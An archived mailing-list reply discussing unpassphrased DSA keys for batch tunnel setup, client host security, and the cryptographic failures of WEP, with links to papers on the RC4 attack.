Steven M. Bellovin wrote:

>Yes, there's a risk of that key and feedback variable being 
>compromised.  The risk is greater than for the DSA secret key, since 
>the latter is generally protected by a passphrase.  Again, though, the 
>weak point is host security.
>  
>
The problem I have given myself is not passwording the DSA private key,
in order for the tunnels to be creatable by batches without wasting time
just piping in a phrase (which defeats the point, slows it down, and
complicates the implementation). Assuming the clients are secure (at
least so far as not being able to read arbitrary files on disk) there
shouldn't be a real problem.

>Right.  That is *the* weak point.  Can you force your users to use 
>Firefox or Opera instead of Internet Explorer?  Can you teach them not 
>to click "yes" just because some pop-up asks them to?  Do they 
>regularly run AV software, anti-spyware software, etc.?  Are they 
>running SP2 with the firewall turned to "paranoid"?  Do ythey have 
>their machines set to auto-download patches?
>  
>
Well they're competent enough and I frequently supervise their
administration, including forcing Firefox use and so on.
Auto-downloading patches is not done (does the Autoupdate service honor
proxy settings?).

>WEP is a case study of why you really need to get some crypto 
>specialists involved when you're designing a cryptographic protocol.  
>The WEP folks made at least three serious mistakes, though one of them 
>-- that RC4 isn't as strong a cipher as had been thought -- was 
>unpredictable.  Several of the problems are described in
>http://www.isaac.cs.berkeley.edu/~iang/pubs/wep-mob01.pdf ; the 
>mistakes made there are, to be blunt, evidence of extreme inexperience. 
>  
>
Reading that, my theory that it was designed as an all-nighter by a kid
they pulled off the street and handed a "Kindergarten Crypto" book to is
supported. Considering IPSec has been around much longer and proven to
be much more sensible even with weak encryption, the least they could
have done is research into it and seen how it could be adapted to work
in smaller devices and only one key. "Oops".

>The cryptanalytic attack is described in
>http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps
>and the way to use it to attack WEP is in
>http://www.isoc.org/isoc/conferences/ndss/02/proceedings/papers/stubbl.pdf
>  
>
Every package manager already appears to have its own toolkits for WEP
subversion: but thanks for the documentation.

Good thing I decided to just do away with WEP: extra administration and
processing overhead (IPW 2200BG has software WEP) for chewing-gum
security. It should be illegal to continue calling it 'wired equivalent'
and especially advertising it as security. From what I hear everyone and
their dog can bring a sufficiently powerful laptop and subvert arbitrary
WEP networks just off battery power - but I hope it's not that severe.

-Dmitri Nikulin